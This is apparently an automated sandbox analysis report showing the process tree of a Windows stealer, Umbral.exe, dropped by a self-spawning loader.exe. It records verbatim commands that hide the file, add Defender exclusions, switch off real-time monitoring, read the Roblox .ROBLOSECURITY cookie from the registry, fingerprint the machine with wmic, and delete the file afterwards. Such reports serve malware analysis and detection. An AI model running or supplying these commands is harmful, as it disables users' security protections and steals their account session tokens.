        PID:3536
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        24⤵
        Checks computer location settings
        
        PID:2536
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        25⤵
        Checks computer location settings
        
        PID:4420
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        26⤵
        Checks computer location settings
        
        PID:3596
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        27⤵
        Checks computer location settings
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        28⤵
        Checks computer location settings
        
        PID:1544
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        29⤵
        Checks computer location settings
        
        PID:452
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        30⤵
        Checks computer location settings
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        31⤵
        Checks computer location settings
        
        PID:4112
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        32⤵
        Checks computer location settings
        
        PID:1052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        33⤵
        Checks computer location settings
        
        PID:800
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        34⤵
        Checks computer location settings
        
        PID:1972
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        35⤵
        Checks computer location settings
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        36⤵
        Checks computer location settings
        
        PID:3712
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        37⤵
        Checks computer location settings
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        38⤵
        Checks computer location settings
        
        PID:2132
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        39⤵
        Checks computer location settings
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        40⤵
        Checks computer location settings
        
        PID:4892
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        41⤵
        Checks computer location settings
        
        PID:3424
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        42⤵
        Checks computer location settings
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        43⤵
        Checks computer location settings
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        44⤵
        Checks computer location settings
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        45⤵
        Checks computer location settings
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        46⤵
        Checks computer location settings
        
        PID:3612
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        47⤵
        Checks computer location settings
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        48⤵
        Checks computer location settings
        
        PID:724
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        49⤵
        Checks computer location settings
        
        PID:1088
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        50⤵
        Checks computer location settings
        
        PID:3728
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        51⤵
        Checks computer location settings
        
        PID:1412
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        52⤵
        Checks computer location settings
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        53⤵
        Checks computer location settings
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        54⤵
        Checks computer location settings
        
        PID:5048
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        55⤵
        Checks computer location settings
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        56⤵
        Checks computer location settings
        
        PID:456
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        57⤵
        Checks computer location settings
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        58⤵
        Checks computer location settings
        
        PID:552
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        59⤵
        Checks computer location settings
        
        PID:3052
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        60⤵
        Checks computer location settings
        
        PID:1656
        
        C:\Users\Admin\AppData\Local\Temp\loader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loader.exe"
        61⤵
        
        PID:5040
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        61⤵
        
        PID:4176
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        61⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        60⤵
        
        PID:4024
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        60⤵
        
        PID:1828
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        59⤵
        
        PID:3984
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        
        PID:3532
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        58⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        58⤵
        Drops file in Drivers directory
        
        PID:3668
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:4164
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        59⤵
        Views/modifies file attributes
        
        PID:4744
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4472
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        59⤵
        
        PID:3860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        59⤵
        
        PID:1660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        59⤵
        
        PID:1332
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        59⤵
        
        PID:1168
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        59⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:552
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        59⤵
        Detects videocard installed
        
        PID:4472
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        59⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1172
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        60⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4564
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        57⤵
        
        PID:3456
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        57⤵
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        56⤵
        
        PID:516
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        55⤵
        
        PID:4540
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        55⤵
        Drops file in Drivers directory
        
        PID:4492
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:2616
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        56⤵
        Views/modifies file attributes
        
        PID:4964
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        56⤵
        
        PID:180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        56⤵
        
        PID:5084
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        56⤵
        
        PID:4168
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        56⤵
        
        PID:1536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        56⤵
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        56⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4816
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        56⤵
        Detects videocard installed
        
        PID:2904
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        56⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3260
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        57⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1748
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        54⤵
        
        PID:3668
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        54⤵
        
        PID:3716
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        53⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        
        PID:1852
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        52⤵
        
        PID:1652
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        52⤵
        Drops file in Drivers directory
        
        PID:4116
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:876
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        53⤵
        Views/modifies file attributes
        
        PID:628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        53⤵
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:516
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        53⤵
        
        PID:2356
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        53⤵
        
        PID:3316
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        53⤵
        
        PID:4364
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        53⤵
        
        PID:3808
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        53⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2496
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        53⤵
        Detects videocard installed
        
        PID:1052
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        53⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4128
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        54⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        51⤵
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        51⤵
        
        PID:680
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        50⤵
        
        PID:1668
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        
        PID:3560
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        49⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        49⤵
        Drops file in Drivers directory
        
        PID:4328
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:2512
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        50⤵
        Views/modifies file attributes
        
        PID:3816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        50⤵
        
        PID:1332
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4860
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        50⤵
        
        PID:4664
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        50⤵
        
        PID:628
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        50⤵
        
        PID:4860
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        50⤵
        
        PID:4072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        50⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1708
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        50⤵
        Detects videocard installed
        
        PID:1464
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        50⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2456
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        51⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2504
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        48⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        48⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        47⤵
        
        PID:1708
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        46⤵
        
        PID:1036
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        46⤵
        Drops file in Drivers directory
        
        PID:1736
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:4484
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        47⤵
        Views/modifies file attributes
        
        PID:4016
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        47⤵
        
        PID:4624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        47⤵
        
        PID:3880
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        47⤵
        
        PID:5016
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        47⤵
        
        PID:3516
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        47⤵
        
        PID:4484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        47⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        47⤵
        Detects videocard installed
        
        PID:3288
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        47⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3220
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        48⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1904
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        45⤵
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        
        PID:1224
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        44⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        44⤵
        Drops file in Drivers directory
        
        PID:1616
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2640
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        45⤵
        Views/modifies file attributes
        
        PID:2504
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1788
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        45⤵
        
        PID:536
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        45⤵
        
        PID:916
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        45⤵
        
        PID:4296
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        45⤵
        
        PID:2132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        45⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:60
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        45⤵
        Detects videocard installed
        
        PID:3288
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
        45⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5056
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        46⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1028
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        43⤵
        
        PID:4484
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        43⤵
        
        PID:1428
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\loaderexp.exe"
        42⤵
        
        PID:4504
        
        C:\Users\Admin\AppData\Local\Temp\Umbral.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        42⤵
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\loaderexp.exe
        
